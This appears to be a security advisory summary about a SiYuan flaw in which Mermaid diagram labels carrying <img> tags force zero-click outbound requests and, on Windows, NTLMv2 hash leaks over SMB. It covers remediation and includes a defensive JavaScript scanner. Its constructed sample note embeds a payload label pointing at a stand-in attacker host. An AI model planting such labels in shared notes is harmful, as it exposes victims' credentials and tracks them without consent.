SiYuan patches zero-click NTLM hash leak via Mermaid rendering
TL;DR — SiYuan’s Mermaid diagram rendering can be abused to force outbound fetches from the Electron client; on Windows this can silently trigger SMB auth and leak NTLMv2 hashes when a victim merely views a note.
What happened
SiYuan is a personal knowledge management system with an Electron-based desktop client that renders rich content inside notes.
CVE-2026-40107 describes a High-severity issue in how SiYuan configures Mermaid.js: securityLevel: "loose" together with htmlLabels: true. With securityLevel set to "loose", Mermaid keeps raw HTML in node labels instead of encoding it the way the default "strict" level does, and htmlLabels: true renders those labels as HTML inside an SVG <foreignObject> rather than as SVG text. The result is that attacker-controlled <img> tags with attacker-chosen src values survive sanitization, land inside the <foreignObject> content, and are inserted into the DOM via innerHTML without any secondary sanitization. Rendering the note is enough; the victim does not have to click anything.
In the advisory's Windows scenario, a protocol-relative URL such as //attacker.com/image.png resolves to a UNC path (\\attacker.com\image.png). A scheme-relative URL inherits the scheme of the document that renders it, so when the rendering document has a file: origin, Chromium resolves //host/path as file://host/path and Windows treats that as an SMB share. Windows then attempts SMB authentication automatically, which discloses the victim's NTLMv2 credential (the NetNTLMv2 challenge/response, which can be cracked offline or relayed) to the attacker's server. The advisory also frames the same primitive as a cross-platform tracking pixel / blind SSRF: with an http(s) src, the client makes an outbound request the moment the diagram renders, revealing that the note was viewed and from which address.
| Item | Source value |
|---|---|
| Affected software | siyuan |
| Impact (per advisory/CVE) | Zero-click NTLMv2 hash theft on Windows; outbound request as tracking/blind SSRF |
| Severity | CVSS v4.0 8.7 (High) |
| Affected versions | <= 3.6.3 (< 3.6.4) |
| Patched versions | v3.6.4 |
This is operationally important for platform and AppSec teams because it turns “viewing content” into a network credential exposure path (Windows SMB/NTLM) and creates a reliable outbound-call primitive from a desktop app—both patterns that routinely enable follow-on compromise in enterprise environments.
Who is impacted
- SiYuan deployments running versions <= 3.6.3.
- Windows users are at highest risk for credential exposure due to the UNC/SMB authentication behavior described in the advisory.
- Organizations where notes/notebooks can be imported, shared, or synced across users/teams (i.e., where untrusted Mermaid content can reach a victim).
What to do now
- Follow vendor remediation guidance and apply the patched release (patched version: v3.6.4).
- Inventory endpoints and installs running siyuan <= 3.6.3, prioritizing Windows fleets.
- Treat Mermaid-rendered note content as untrusted input until confirmed patched, especially for shared/imported notebooks.
- If you suspect exposure, investigate for unexpected outbound SMB (TCP 445) connections to internet hosts and HTTP requests to unfamiliar hosts during note rendering, and assess downstream NTLM relay / credential-cracking risk in your environment. Blocking outbound SMB at the network edge, a long-standing hardening recommendation, closes the credential-leak path even on unpatched clients, though it does not stop the HTTP beacon.
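The following is an added example, not code from SiYuan, Mermaid or the advisory. It shows the two halves of the issue described above: how a scheme-relative <img> src resolves differently depending on the origin of the rendering document (file: gives a UNC/SMB target, http: gives an outbound web request), and a small triage scanner that pulls <img> tags out of Mermaid fences in a note and classifies each src. The sample note, the attacker.example host and both renderer base URLs are constructed for illustration; the actual origin SiYuan's Electron renderer loads from is not stated on this page, and the regexes are deliberately simple.

```javascript
// Added example (not SiYuan's or Mermaid's code). Uses only Node's built-in WHATWG URL class.

// Simplified extraction: good enough for the constructed sample below; a production
// scanner would use a Markdown/HTML parser instead of regexes.
const MERMAID_FENCE = /```mermaid\s*\n([\s\S]*?)```/g;
const IMG_SRC = /<img\b[^>]*\bsrc\s*=\s*["']([^"']*)["']/gi;

// Resolve an <img src> against the origin of the document that renders the diagram.
// A scheme-relative src (//host/path) inherits the document's scheme, which is the whole
// trick: under a file: base it becomes file://host/path, which Chromium on Windows treats
// as the UNC share \\host\path and Windows answers with automatic SMB authentication.
function resolveSrc(src, documentBase) {
  let url;
  try {
    url = new URL(src, documentBase);
  } catch {
    return { href: src, kind: "unparseable" };
  }
  if (url.protocol === "file:") {
    if (url.hostname !== "") {
      // A host in a file: URL is a UNC path: this is the NTLM-leak case.
      const unc = `\\\\${url.hostname}${url.pathname.replace(/\//g, "\\")}`;
      return { href: url.href, kind: "unc-smb", unc };
    }
    return { href: url.href, kind: "local-file" };
  }
  if (url.protocol === "http:" || url.protocol === "https:") {
    // Any non-loopback host is an outbound beacon (tracking pixel / blind SSRF) on every platform.
    const loopback = ["127.0.0.1", "localhost", "[::1]"].includes(url.hostname);
    return { href: url.href, kind: loopback ? "local-http" : "external-http" };
  }
  if (url.protocol === "data:") return { href: url.href.slice(0, 40), kind: "inline-data" };
  return { href: url.href, kind: "other:" + url.protocol };
}

// Scan a note's Markdown for Mermaid blocks carrying <img> labels and classify each src.
function scanNote(markdown, documentBase) {
  const findings = [];
  for (const fence of markdown.matchAll(MERMAID_FENCE)) {
    for (const img of fence[1].matchAll(IMG_SRC)) {
      findings.push({ src: img[1], ...resolveSrc(img[1], documentBase) });
    }
  }
  return findings;
}

// Constructed sample note (not from the advisory): one scheme-relative image, one explicit
// https image, one relative local image.
const SAMPLE_NOTE = `# Meeting notes

\`\`\`mermaid
graph TD
  A["Start"] --> B["<img src='//attacker.example/pixel.png'>Review"]
  B --> C["<img src='https://cdn.example/logo.png'>Done"]
  C --> D["<img src='assets/local.png'>End"]
\`\`\`
`;

// Hypothetical renderer origins: a file: origin turns the first src into an SMB target,
// an http: origin turns it into a plain outbound request.
const RENDERER_BASES = [
  "file:///C:/Program%20Files/SiYuan/app/index.html",
  "http://127.0.0.1:6806/stage/build/app/",
];

function demo() {
  const out = {};
  for (const base of RENDERER_BASES) {
    out[base] = scanNote(SAMPLE_NOTE, base);
    console.log(`renderer base: ${base}`);
    for (const f of out[base]) console.log("  ", f.kind.padEnd(13), f.href, f.unc ?? "");
  }
  return out;
}

demo();
```

Running it prints the same three labels classified twice: under the file: base the scheme-relative src becomes the UNC target \\attacker.example\pixel.png (the zero-click credential leak), while under the http: base it becomes http://attacker.example/pixel.png (the beacon). The explicit https src is an external request under either base, which is why patching does not remove the need to treat shared notebooks as untrusted input.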
Additional Information
- Vendor advisory (root cause, PoC, and suggested fix details): https://github.com/siyuan-note/siyuan/security/advisories/GHSA-w95v-4h65-j455
Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly; send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.
